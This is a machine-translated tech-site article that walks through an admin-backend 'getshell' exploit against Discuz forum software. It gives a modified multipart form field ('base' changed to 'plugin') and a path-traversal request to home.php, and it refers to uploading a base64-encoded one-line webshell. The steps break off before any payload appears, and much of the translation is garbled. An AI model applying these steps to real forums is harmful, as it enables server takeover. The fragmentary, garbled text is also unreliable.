Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

Example Analysis of the latest background getshell of discuz

2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of discuz's latest background getshell, which has a certain reference value. Interested friends can refer to it. I hope you will gain a lot after reading this article. Let's take a look at it.

User-user column-column grouping-submit-grab packet (I made a mistake at this step, be sure to submit, otherwise the packet captured is not the same)

1Content-Disposition: form-data; name= "settingnew [profilegroupnew] [base] [available]"

Change to

1Content-Disposition: form-data; name= "settingnew [profilegroupnew] [plugin] [available]"

Visit

1/home.php?mod=spacecp&id=../../robots.txt57

Local test dzx2.5 grab package to change base to plugin in the following figure

In the test environment, the upload sentence * * failed to connect with the kitchen knife, and finally changed to base64 encryption.

/ / content before encryption

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Articles encryption background examples analysis content pictures columns users kitchen knives tests one sentence the following picture value interest and at the same time address that is data more vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Linux Xiaomi MariaDB MySQL Docker Huawei NVidia Apple Shulou Technology OPPO Reno Shulou Information macOS Microsoft Redmi vpn Shulou Tech Info Linux Xiaomi MariaDB MySQL Docker Huawei NVidia Apple Shulou Technology OPPO Reno Shulou Information macOS Microsoft Redmi vpn Shulou Tech Info

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report